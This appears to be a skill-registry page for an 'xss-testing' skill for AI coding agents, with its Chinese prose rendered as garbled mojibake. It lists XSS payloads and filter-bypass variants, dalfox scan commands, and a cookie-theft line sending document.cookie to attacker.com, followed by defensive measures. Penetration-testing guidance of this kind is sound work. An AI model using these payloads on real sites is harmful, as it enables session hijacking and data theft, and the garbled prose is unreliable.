xss-testing
11
总安装量
5
周安装量
#28119
全站排名
安装命令
npx skills add https://github.com/ed1s0nz/cyberstrikeai --skill xss-testing
Agent 安装分布
codex
4
opencode
3
amp
2
kimi-cli
2
gemini-cli
2
Skill 文档
XSSæµè¯æè½
æ¦è¿°
è·¨ç«èæ¬æ»å»(XSS)å 许æ»å»è å¨å害è çæµè§å¨ä¸æ§è¡æ¶æJavaScript代ç ãæ¬æè½æ¶µçåå°åãåå¨ååDOMåXSSçæµè¯æ¹æ³ã
XSSç±»å
1. åå°åXSS (Reflected XSS)
- æ¶æèæ¬éè¿URLåæ°ä¼ é
- æå¡å¨ç´æ¥è¿åå å«èæ¬çååº
- éè¦ç¨æ·ç¹å»æ¶æé¾æ¥
2. åå¨åXSS (Stored XSS)
- æ¶æèæ¬åå¨å¨æå¡å¨ï¼æ°æ®åºãæä»¶çï¼
- ææè®¿é®åå½±å页é¢çç¨æ·é½ä¼æ§è¡èæ¬
- å½±åèå´æ´å¤§
3. DOMåXSS (DOM-based XSS)
- 客æ·ç«¯JavaScriptå¤çç¨æ·è¾å ¥ä¸å½
- 䏿¶åæå¡å¨ç«¯å¤ç
- éè¿ä¿®æ¹DOMç»æè§¦å
æµè¯æ¹æ³
åºç¡Payload
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<body onload=alert('XSS')>
ç»è¿è¿æ»¤
大å°åç»è¿
<ScRiPt>alert('XSS')</ScRiPt>
ç¼ç ç»è¿
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
äºä»¶å¤çå¨
<img src=x onerror=alert(String.fromCharCode(88,83,83))>
<div onmouseover=alert('XSS')>hover</div>
<input onfocus=alert('XSS') autofocus>
伪åè®®
<a href="javascript:alert('XSS')">click</a>
<iframe src="javascript:alert('XSS')">
é«çº§ç»è¿ææ¯
使ç¨String.fromCharCode
<script>alert(String.fromCharCode(88,83,83))</script>
使ç¨evalåatob
<script>eval(atob('YWxlcnQoJ1hTUycp'))</script>
使ç¨HTMLå®ä½
<script>alert('XSS')</script>
å·¥å ·ä½¿ç¨
dalfox
# åºç¡æ«æ
dalfox url "http://target.com/page?q=test"
# æå®åæ°
dalfox url "http://target.com/page" -d "q=test" -X POST
# 使ç¨èªå®ä¹payload
dalfox url "http://target.com/page?q=test" --custom-payload payloads.txt
Burp Suite
- 使ç¨Intruder模åè¿è¡æ¹éæµè¯
- 使ç¨Repeateræå¨æµè¯
- 使ç¨Scannerèªå¨æ£æµ
æµè§å¨æ§å¶å°
- æµè¯DOMåXSS
- æ£æ¥JavaScriptæ§è¡ç¯å¢
- è°è¯payload
éªè¯åå©ç¨
éªè¯æ¥éª¤
- 确认payload被æ§è¡
- æ£æ¥æ¯å¦è¢«è¿æ»¤æç¼ç
- æµè¯ä¸åä¸ä¸æï¼HTMLãJavaScriptã屿§çï¼
- è¯ä¼°å½±åï¼Cookieçªåãä¼è¯å«æçï¼
å©ç¨åºæ¯
- Cookieçªåï¼
<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script> - é®çè®°å½ï¼æ³¨å ¥é®çäºä»¶çå¬å¨
- éé±¼æ»å»ï¼ä¼ªé ç»å½è¡¨å
- ä¼è¯å«æï¼è·åç¨æ·ä¼è¯token
æ¥åè¦ç¹
- XSSç±»åï¼åå°/åå¨/DOMï¼
- 触åä½ç½®ååæ°
- 宿´çPOC
- å½±åè¯ä¼°
- ä¿®å¤å»ºè®®ï¼è¾åºç¼ç ãCSPçç¥çï¼
鲿¤æªæ½
- è¾å ¥éªè¯åè¿æ»¤
- è¾åºç¼ç ï¼HTMLãJavaScriptãURLï¼
- Content Security Policy (CSP)
- HttpOnly Cookieæ å¿
- 使ç¨å®å ¨çæ¡æ¶ååº